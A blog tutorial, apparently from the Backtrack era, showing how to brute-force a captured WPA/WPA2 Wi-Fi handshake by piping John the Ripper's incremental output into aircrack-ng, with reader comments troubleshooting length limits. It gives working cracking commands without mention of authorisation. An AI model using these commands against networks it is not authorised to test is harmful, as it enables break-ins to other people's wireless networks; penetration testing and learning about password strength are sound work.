Skip to main content

Brute forcing WPA/WPA2 handshake with john the ripper

Please refer to this article for a tutorial on how to obtain a handshake.

How to crack WPA/WPA 2 with aircrack-ng (Backtrack 5) 

The limitation of a dictionary attack is that unless the password is in your dictionary file, your attack won't be successful. Another way to obtain the password is to brute force it with john the ripper. In theory it is possible to crack ANY password with this method, but it might take a million years to crack a full 128 ASCII characters password with your computer.

Ok, the command:

This was on Backtrack
/pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)

Debian
sudo apt-get install john
/usr/sbin/john --stdout --incremental:all | aircrack-ng -b (bssid) -w file.cap (wpa handshake file)
By default john will only try passwords with 8 characters or less. However, the minimum  pass-phrase length for WPA is 8.You need to edit the john.conf file to change the max length of the output.

"--inrecemtal:all" means that john will try all 128 ASCII characters, which will  take thousand of years to complete if the password has a proper lenght. You can also try -i:digits for numbers only or -i:alpha for a to z.

Good luck.

P.S.: You might be interested in this simple Linux dictionary password cracker written in python:  Article
Labels:

Comments

  1. Anonymous18 April 2013 at 10:44

    i edited the john.conf file to bruteforce 8 characters and more but when executing the command it returns with error

    "MaxLen = 10 exceeds the compile-time limit of 8

    There are several good reasons why you probably don't need to raise it:
    - many hash types don't support passwords (or password halves) longer than
    7 or 8 characters;
    - you probably don't have sufficient statistical information to generate a
    charset file for lengths beyond 8;
    - the limitation applies to incremental mode only."

    ReplyDelete
  2. Algo12 April 2014 at 16:21

    Can this be done with THC Hydra (its imho much better)

    ReplyDelete
  3. rerokoa9 November 2015 at 21:29

    it works .. for me ..
    but this command doesn't working
    "--incremental:all" you either type "incremental=" leave it blank or use one of the incremental types you fin in /etc/john/jon.conf
    the question is if i leave it blank or if i use "ASCII"
    will this include uppercase and special characters ?

    ReplyDelete

Post a Comment

Popular posts from this blog

OsmocomBB - Hardware and Software Setup - Tutorial (Motorola C118)

OsmocomBB is an Open Source GSM Baseband software implementation. By using the sofware on a compatible phone (e.g. Motorola C118), you are able to make and receive phone calls, send and receive SMS, etc. based on Free Software only.       Hardware PL2303HX USB Serial To RS232 TTL Chip 2.5 mm audio jack Motorola C118 (E88) This is a typical pin-out of a 2.5 mm audio jack: L (Left Signal) Tip 1 Green R (Right Signal) Ring 2 Red GND (Ground) Sleeve 3 Bare Copper You need to soldier the 2.5mm audio jack to the USB Serial To RS232 TTL Chip, whereas TxD is at the tip of the plug RxD is at the middle contact GND is the outer contact  Software Connect the phone to your PC and check if it is being recognized. dmesg | grep tty user@user:~$ dmesg | grep tty [    0.000000] console [tty0] enabled [ 6522.143379] usb 3-2: pl2303 converter now attached to ttyUSB0 To make sure everything is working, install cu and c
9 comments
Read more

Scid vs PC installation guide - Ubuntu (Mint, Debian etc.)

Scid vs PC Scid vs PC is definitely the best and most comprehensive chess software for Linux.  Unfortunately I struggled quite a bit to get it up and running. Before I start: You might prefer to watch the video. Otherwise keep on reading. Open a terminal and execute the following commands sudo apt-get install auto-apt build-essential sudo auto-apt update-local sudo auto-apt update sudo auto-apt updatedb Now make sure you got both tcl8.5-dev and tk8.5-dev installed sudo apt-get install tcl8.5-dev tcl8.5 sudo apt-get install tk8.5-dev tk8.5 Some users are reporting problems on Ubuntu 14.04. sudo apt-get install tcl8.6-dev tcl8.6 sudo apt-get install tk8.6-dev tk8.6 libgcj15-dev The 'x' refers to the current release: e.g. 4.9.tgz download scid vs pc: http://sourceforge.net/projects/scidvspc/files/source/scid_vs_pc-4.9.tgz/download tar -xzf scid_vs_pc-4.xx.tgz cd scid_vs_pc-4.x sudo auto-apt run ./configure sudo auto-apt run make sudo auto-apt run make install
36 comments
Read more

Automatically Reconnect WIFI (Debian, Ubuntu etc.)

The Problem For several reason I do not have access to LAN and thus have to rely on WIFI for my mining rigs. It is fine for most of the time, but the shit hits the fan, when the connection drops for one reason or another. The Solution #!/bin/bash wlan=`/sbin/ifconfig wlan1 | grep inet\ addr | wc -l` if [ $wlan -eq 0 ]; then service network-manager restart else echo WIFI IS UP fi Note: It's either wlan0 or wlan1. Check with sudo ifconfig . Save the script and make it executable. sudo chmod +x filename.sh Now there are several ways of making sure that our script is being executed every x minutes. The easiest way of accomplishing that I think is by using the command watch . sudo su watch -n 600 sh filename.sh What it does is execute our filename.sh script every 600 seconds. Or you implement a so called cron job   sudo crontab -e Add the following PATH=/usr/sbin:/usr/bin:/sbin:/bin */5 * * * * sh /home/username/filename.sh */5 * * * * means that
2 comments
Read more